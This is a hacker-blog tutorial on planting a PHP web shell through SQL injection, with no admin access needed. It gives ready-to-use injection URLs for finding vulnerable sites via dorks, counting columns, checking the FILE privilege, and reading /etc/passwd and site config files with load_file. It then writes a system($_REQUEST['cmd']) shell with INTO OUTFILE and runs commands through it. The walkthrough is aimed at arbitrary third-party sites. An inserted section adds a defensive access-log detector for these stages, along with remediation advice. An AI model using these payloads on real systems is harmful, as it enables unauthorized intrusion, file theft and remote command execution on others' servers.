How to upload Web-Shell without admin panel


Hello guys, welcome back to another article. In today’s article I am going to show how to upload a web shell without an admin panel.

Many of you are curious about how this is possible. You’ll get the answer in this article, so stay with me and subscribe to notifications.

Many of you know about SQL injection. I hope you do, because I am going to use SQL injection to upload the web shell.

So let’s start. I am not explaining the basics in this article; if you don’t know them, I suggest this article: SQL injection in PHP.

First, find a website vulnerable to SQL injection using Google dorks. I hope you’ll get one.

Example:

https://www.website.com/index.php?id=1′ — –

Then find the number of columns using order by.

Example:

https://www.website.com/index.php?id=1′ order by 1 — – (no error)

https://www.website.com/index.php?id=1′ order by 2 — – (no error)

https://www.website.com/index.php?id=1′ order by 3 — – (no error)

.

.

https://www.website.com/index.php?id=1′ order by 7 — – (got the error Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /home/abc/public_html/functions.php )

So we got the total number of columns. Now find the vulnerable columns using union select. I hope you will find vulnerable columns; I found column numbers 3 and 4 vulnerable.

Now let’s check the database user’s privileges for writing files using file_priv.

Example:

https://www.website.com/index.php?id=1′ union select 1,2,file_priv,4,5,6 FROM mysql.user where user=user() — –

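If this shows (Y) in place of the vulnerable column, that means the current user has the FILE privilege and can write files in the website’s directory, as long as the server’s secure_file_priv setting and the directory’s filesystem permissions allow it.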

ohyeah

If you don’t get it, try another website; this website is not going to work for this trick.

Now let’s try to write a file in the website’s directory, as shown in the example below.

https://www.website.com/index.php?id=1′ union select 1,2,”<?system($_REQUEST[‘cmd’]);?>”,4,5,6 into outfile ‘/home/site/public_html/abc/WRITABLE_DIRECTORY(uploads)/shell.php’ — –

Important: you have to enter the full path of the directory you want to write the file to.

Where can you get the full path?

Normally the full path of the website on the server is displayed in the SQL injection error.

If you didn’t find the path in the SQL injection error, then follow the steps below.

Step 1:

https://www.website.com/index.php?id=1′ union select 1,2,load_file(‘/etc/passwd’),4,5,6 — –

Now the server’s passwd file is displayed. You have to find the conf file name of the current website (example: abc.conf).

Step 2:

You have to access one more file to get the full path of the website. Example shown below:

https://www.website.com/index.php?id=1′ union select 1,2,load_file(‘/etc/abc.conf’),4,5,6 — –

The above example will load the conf file and you get the full path.

That’s how you can upload a file using SQL injection without an admin panel.

And now the final step: let’s access the uploaded file.

Hell yeah

https://www.website.com/WRITABLE_DIRECTORY(uploads)/shell.php?cmd=whoami
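
Every stage above (order by, union select, file_priv, load_file, into outfile, then the request for the written .php file) leaves a recognizable line in the web server's access log. The detector below is an added example, not code from the original article; it assumes combined-format access logs and an upload directory named "uploads", and the rule names, sample lines and placeholder paths are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Indicators for the stages described above, matched on the decoded query string.
RULES = [
    ("column-count", re.compile(r"\border\s+by\s+\d+\b")),
    ("union-probe", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("priv-probe", re.compile(r"\bfile_priv\b|\bmysql\.user\b")),
    ("file-read", re.compile(r"\bload_file\s*\(")),
    ("file-write", re.compile(r"\binto\s+(out|dump)file\b")),
    ("php-tag", re.compile(r"<\?")),
]
# Assumption: upload directories are named "upload" or "uploads" and never serve PHP.
UPLOAD_PHP = re.compile(r"/uploads?/.*\.php$", re.I)

def normalize(value):
    """Percent-decode, then fold case and whitespace so the keyword rules match."""
    return re.sub(r"\s+", " ", unquote_plus(value)).lower()

def classify(request_target):
    """Return the sorted rule names that fire for one request target (path?query)."""
    parts = urlsplit(request_target)
    query = normalize(parts.query)
    hits = {name for name, rx in RULES if rx.search(query)}
    if UPLOAD_PHP.search(unquote_plus(parts.path)):
        hits.add("php-in-upload-dir")
    return sorted(hits)

LOG_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/')

def scan(log_lines):
    """Return [(client, hits)] for access-log lines that trigger at least one rule."""
    matches = filter(None, map(LOG_RE.match, log_lines))
    return [(m.group(1), h) for m in matches if (h := classify(m.group(2)))]

# Constructed sample lines (documentation IP range, placeholder paths; not real traffic).
SAMPLE = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?id=1%27+order+by+7--+- HTTP/1.1" 200 97',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?id=1%27+union+select+1,2,file_priv,4,5,6+FROM+mysql.user-- HTTP/1.1" 200 530',
    '203.0.113.7 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?id=1%27+union+select+1,2,3,4,5,6+INTO%20OUTFILE+%27/PLACEHOLDER/uploads/x.php%27 HTTP/1.1" 200 97',
    '203.0.113.7 - - [01/Jan/2024:10:00:20 +0000] "GET /uploads/x.php?cmd=id HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for client, hits in scan(SAMPLE):
        print(client, ",".join(hits))
```

These alerts are triage signals only. The durable fixes are parameterized queries in the application, a database account without the FILE privilege, and an upload directory where the web server does not execute PHP.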

Thank you for reading this article. If you found this article informative, share it with your hacker friends. See you in the next article 😁

 
